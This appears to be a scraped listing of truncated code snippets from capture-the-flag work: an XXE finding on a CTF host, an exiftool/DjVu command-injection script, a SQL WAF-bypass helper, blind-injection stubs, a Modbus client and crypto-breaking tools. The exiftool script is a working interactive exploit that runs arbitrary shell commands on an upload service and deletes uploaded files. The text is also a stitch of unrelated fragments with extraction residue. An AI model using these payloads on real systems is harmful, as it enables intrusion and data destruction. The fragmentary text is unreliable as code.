Out-of-band (OOB) XXE found at: http://challenges1.thcon.party:2000/create_pres.php
POST /create_pres.php HTTP/1.1
Host: challenges1.thcon.party:2000
#!/usr/bin/env python3 | |
import requests | |
from urllib.parse import urlsplit, parse_qs | |
import base64 | |
import time | |
class MYGES: | |
def __init__(self, username, password): |
#!/usr/bin/env bash | |
while true; do | |
read -p "> " userinput | |
if [[ "$userinput" =~ "exit" ]]; then exit; fi | |
payload="(metadata \"\\c\${system('rm uploads/*.jpg;echo dfff0a70fa1a55c8c1a4966c19f6da452 ; $userinput ; echo dfff0a70fa1a55c8c1a4966c19f6da452')};\")" | |
echo $payload > payload | |
bzz payload payload.bzz | |
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz | |
exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg 1> /dev/null |
import requests | |
import time | |
import string | |
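# Timeout value used by the script. The unit is not visible in this excerpt;
# presumably seconds, given the `requests`/`time` imports -- TODO confirm.
# (The trailing "| |" extraction residue, which made this line a syntax error,
# has been dropped.)
TIMEOUT = 10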
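def waf_bypass(payload):
    """Rewrite *payload* as one quoted literal per character, joined by ``||``.

    Every character of the input becomes its own ``'c'`` literal, so the
    original text never appears contiguously in the result: ``"ab"`` becomes
    ``'a'||'b'``. An empty payload yields an empty string.

    NOTE(review): the name suggests the result is consumed by a SQL dialect in
    which ``||`` concatenates strings, behind a filter that matches literal
    substrings -- confirm against the caller. A filter that inspects only the
    raw request text will not see the reassembled value; matching has to be
    done on the parsed or normalized expression, and parameterized queries
    remove the need for such filtering.

    Args:
        payload: The string to split into single-character literals.

    Returns:
        The ``||``-joined sequence of quoted characters.
    """
    # The extracted page lost the body indentation and appended "| |" to each
    # line; both are restored here so the function parses again.
    return "||".join(f"'{c}'" for c in payload)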
def peek(substring): | |
substring = substring.strip() |
.386 | |
.model flat | |
.data | |
array DWORD 7,8,9,0,64,10,0,147,14 | |
.code | |
main proc | |
xor ecx, ecx |
Out-of-band (OOB) XXE found at: http://challenges1.thcon.party:2000/create_pres.php
POST /create_pres.php HTTP/1.1
Host: challenges1.thcon.party:2000
from pymodbus.client.sync import ModbusTcpClient | |
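# Constants for the Modbus client script. The trailing "| |" extraction residue
# that made each of these lines a syntax error has been dropped; values are
# unchanged.

# Presumably the Modbus unit (slave) id passed with each request -- TODO
# confirm against the client calls, which are outside this excerpt.
UNIT = 1

# Three records with the same shape: a target "to_fill" value plus the ids of
# an associated valve and regulator. The names suggest red/green/blue channels;
# whether the ids are coil or register addresses is not visible here -- verify.
R = {"to_fill": 32, "valve_id": 0, "regu_id": 32}
G = {"to_fill": 126, "valve_id": 1, "regu_id": 33}
B = {"to_fill": 42, "valve_id": 2, "regu_id": 34}

# Upper bound; presumably the ceiling for the "to_fill" values -- confirm.
MAX = 255

# Two further records pairing a register id with its maximum value. What M and
# F stand for is not visible in this excerpt.
M = {"register_id": 6, "max": 100}
F = {"register_id": 10, "max": 200}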
import requests | |
from bs4 import BeautifulSoup | |
import re | |
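# Base URL of the site this script talks to (presumably fetched with
# `requests` and parsed with BeautifulSoup -- the calls are outside this
# excerpt). The trailing "| |" extraction residue has been dropped.
URL = "https://www.root-me.org/"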
GRADES = { | |
"visitor": 100, | |
"curious": 500, | |
"trainee": 2017, | |
"insider": 3535, |
#!/usr/bin/env python3 | |
import requests | |
import string | |
import time | |
import sys | |
import random | |
import string | |
''' | |
table : | |
- users : |
#!/usr/bin/env python3 | |
import json | |
import os | |
import sys | |
import re | |
import binascii | |
from Crypto.Cipher import AES | |
from Crypto.Util.Padding import pad,unpad | |
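# Block size in bytes. 16 matches the AES block size; presumably this is the
# value handed to pad()/unpad() -- confirm against the calls, which are outside
# this excerpt.
BLOCK_SIZE = 16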
#!/usr/bin/env python3 | |
import base64 | |
import argparse | |
import string | |
class XorBreak: | |
def __init__(self, clear, ciphertext, key, cribs): | |
self.clear = clear | |
self.ciphertext = ciphertext | |
self.key = key |